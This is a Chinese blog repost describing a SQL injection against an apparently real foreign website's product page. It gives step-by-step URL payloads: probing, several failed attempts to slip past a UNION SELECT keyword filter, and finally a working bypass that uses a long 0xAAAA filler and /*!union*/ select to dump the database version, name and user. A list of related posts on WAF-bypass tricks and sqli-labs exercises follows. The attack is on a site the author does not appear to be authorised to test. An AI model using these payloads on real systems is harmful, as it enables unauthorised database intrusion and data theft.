变态方法突破过滤UNION+SELECT继续注入

最新推荐文章于 2025-06-29 16:19:58 发布
转载 最新推荐文章于 2025-06-29 16:19:58 发布 · 1.1w 阅读 · 16

http://www.jb51.net/article/48933.htm


  前几今天遇到一个bt 的老外注射点:

    //*ps 此点目前流行的注射工具射不 *//

    http:// /index.php?content=more_product&id=17

    http:// /index.php?content=more_product&id=17 and 1=1 正常

    http:// /index.php?content=more_product&id=17 and 1=2 报错

    http:// /index.php?content=more_product&id=17 order by 6 正常

    http:// /index.php?content=more_product&id=17 order by 7 错误

    继续按照常规的手法注射:

    http:// /index.php?content=more_product&id=-17+UNION+SELECT+1,2,

    3,4,5,6--

    错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过

    http:// /index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/

    /**//*!sElEcT*//**//**/1,2,3,4,5,6--

    悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…

    http:// /index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n

    *//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--

    http:// /index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca

    t(s,e,l,e,c,t)+all+1,2,3,4,5,6--

    悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内

    的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑

    客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

    于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-

    靠,老外果然牛B 那么继续射

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u

    ser()),3,4,5,6--+-

    成功得到系统版本、当前数据库用户、用户名


SQL 注入绕过技术再次总结
m0_61506558的博客
10-24 494
产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。空格 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云。脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。注入,也有一些产品会在服务器安装软件,例如 iis。waf 加速乐等安全产品,这些产品会自带 waf。
sql注入杂谈(一)--union select
weixin_43570648的博客
03-19 1585
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。 就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1 我们的教程里面就说127.0.0.1/less-1/?id=1’ 加上单引号,看爆不爆错,...
sqli-labs第二十七关——Trick with select&union
2403_88102829的博客
05-26 473
进去之后,可以看见提示这一关新屏蔽了unionselect,查看源码确定:/*,--+,#,spaces,unionselectunionselect的大小写均被屏蔽了。
SQL 注入绕过过滤
最新发布
2401_82890055的博客
06-29 329
比赛时遇到一个登录页面,试了很多常规用户名和密码都登录不上。学过 Web 安全知识后,我猜测这可能是 SQL 注入题。随便输入单引号,页面报错了,这就说明存在 SQL 注入点。不过,当我尝试输入 unionselect 这类常见的注入关键词时,发现都被拦截了,看来得想办法绕过过滤才行。这道题的核心就是绕过过滤。我们利用双写、内联注释打破限制,再靠 SQL 注入的报错特性,一点点把数据库里的信息挖出来。以后遇到关键词过滤,多研究研究数据库的特性,肯定能找到办法。
sqli-labs:less-28(过滤unionselect
羽的博客
09-15 321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sql注入绕过union select
weixin_30332241的博客
08-11 216
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ ...
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1776
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
绕过UNION&SELECT过滤
ChuMeng1999的博客
10-30 612
打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号和圆括号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-双引号』。很多不可见的空白字符都可以用哦,你可以试试。针对于过滤,我们要善用编码,来绕过关键字过滤
Mysql组合查询-UNION-多个SELECT语句作为单个查询结果返回
刘春明的博客
08-11 1万+
有两种基本情况需要使用组合查询: 1、在单个查询中从不同的表返回结构类似的数据; 2、对单个表执行多个查询,按单个查询返回数据。 使用UNION 创建组合查询很简单,所需要做的只是给出每条SELECT语句,然后在各SELECT语句中间放上UNION。 举例:需要查询价格小于等于5的所有物品的一个列表,而且还想包括供应商1001和1002生产的所有物品(不考虑价格)。当然,可以利用WHER
渗透测试-百日筑基—SQL注入篇&时间注入&绕过&HTTP数据编码&绕过—下
LANDUOSHUREN的博客
10-25 1509
SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。
网络安全---文件上传、sql注入判断
bffanfan的博客
01-07 534
文件上传 1.文件 动态文件:具有交互性的文件 格式:.py .php 等与代码相关的文件,与后台进行交互 静态文件:不具有交互性的文件 格式:.jpg .txt .mp3(二进制流通过播放器所呈现的效果).html(将二进制流发送至用户端,浏览器对页面信息进行解析) 当静态文件当成动态文件同样会被执行,某些漏洞也会导致静态文件被执行 漏洞—动态文件:上传、找到路径调用 ​ —静态文件:上传、找到路径、利用可执行的漏洞进行调用 2.文件上传漏洞 概述 我们在上网时经常会使用文件上传的功能,比如上传一个头像图
SQL注入--安全(二)
qq_43371350的博客
03-25 7804
写在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。 前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时会有意识的进行防御设置,或者安全测试来封堵web注入 2、各大安全厂商生产的硬件或者软件WAF产品 黑名单过滤技术 1、过滤sql关键字段 常见的关键字:and、or、union a...
Access数据库SQL注入小结
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
SQL 自学:利用 UNION 操作符组合 SELECT 语句结果集
Nervousr的博客
10-09 931
在 SQL 中,UNION操作符是一个非常强大的工具,它允许我们将多条SELECT语句的结果组合成一个单一的结果集。这在很多实际应用场景中都非常有用,比如整合来自不同表但具有相似结构的数据,或者从同一个表中按照不同条件查询数据并将结果合并。
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
热门推荐
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
[php审计实战篇]BlueCms v1.6 Union注入
dfdhxb995397的博客
12-11 176
非常基础的代码审计练习,适合有php基础的审计新手练习 本文作者:Aedoo 来源:i春秋社区 0×01 代码跟踪 首先,进入首页代码 :index.php 包含了php文件:/include/common.inc.php 跟踪这个php文件,这些文件都是包含的全局文件。 这个php文件还是先包含了几个全局文件。 最主要的是上图最下方的if判断: ...
如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集
Vin_c° 的专栏
05-18 2981
文章目录一、组合查询二、创建组合查询2.1 使用 UNION2.2 UNION 规则2.3 包含或取消重复的行2.4 对组合查询结果排序三、小结 本文介绍如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集。使用 UNION 可极大地简化复杂的 WHERE 子句,简化从多个表中检索数据的工作。 一、组合查询 多数 SQL 查询只包含从一个或多个表中返回数据的单条 SELECT 语句。但是,SQL 也允许执行多个查询(多条 SELECT 语句),并将结果作为一个查询结果集返回。 这些
【安全】P 2-18 绕过剔除黑名单(unionselect)的SQL注入
Z_David_Z的博客
02-15 783
目录0X01 基础知识介绍0X02 去除(union)的代码分析0X03 绕过去除(union)的sql的注入0X04 sqlmap安全检测 0X01 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码通过解码识别。 3、符号和关键字替换 and – &&、or – ||。 4、空格使用 %20表示、%0a换行 %09 tab 0X02 去除(union)的代码分析 preg_replace(mixed $pattern , mixed
union select与sql注入
01-09
### SQL注入攻击中的`UNION SELECT`用法 在SQL注入攻击中,`UNION SELECT`语句被用来组合两个或多个SELECT查询的结果集。当应用程序未能正确过滤用户输入时,攻击者可以利用此特性来附加额外的查询并检索数据库内的敏感数据。 例如,在存在漏洞的应用程序参数处插入如下恶意字符串: ```sql 1' UNION ALL SELECT NULL, version(), database() -- ``` 这条命令会尝试将原始查询与新创建的选择服务器版本号和当前使用的数据库名称的查询联合起来[^2]。 如果目标表中有三个字段,则上述有效载荷可能返回类似于下面的内容: | id | title | content | |----|-------------|---------| | 1 | Welcome Page| ... | | | 8.0.30 | mysql | 其中第二行来自攻击者的自定义查询而不是应用预期的数据记录。 ### 防护措施 为了防止这种类型的攻击发生,开发者应该采取以下几种方法之一或多样的安全实践: #### 输入验证与清理 确保所有外部输入都经过严格的校验,只允许合法字符通过,并移除任何潜在危险符号如单引号 `'`, 双划线 `--` 或其他特殊标记。 #### 使用预编译语句(Prepared Statements) 采用参数化查询而非直接拼接字符串构建最终指令文本。这使得即使包含有害成分也无法改变原有逻辑结构从而失去危害能力。 对于Python Flask框架而言,可以通过SQLAlchemy ORM实现这一点: ```python from sqlalchemy import create_engine, text engine = create_engine('mysql+pymysql://user:password@localhost/dbname') with engine.connect() as connection: result = connection.execute( text("SELECT * FROM users WHERE username=:username"), {"username": user_input} ) ``` #### 启用Web Application Firewall (WAF) 部署专门设计用于识别已知模式并向管理员发出警报的安全设备可以帮助减轻风险水平。这些工具能够自动拦截大多数常见的SQLi企图而不影响正常业务流程继续运行下去[^3]。 #### 定期扫描网站内容 使用像DIRB这样的自动化工具定期检查是否有未授权访问路径暴露在外网环境中是非常重要的预防手段之一。这类软件基于字典暴力枚举URL地址空间寻找隐藏资源文件夹链接等信息泄露点。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值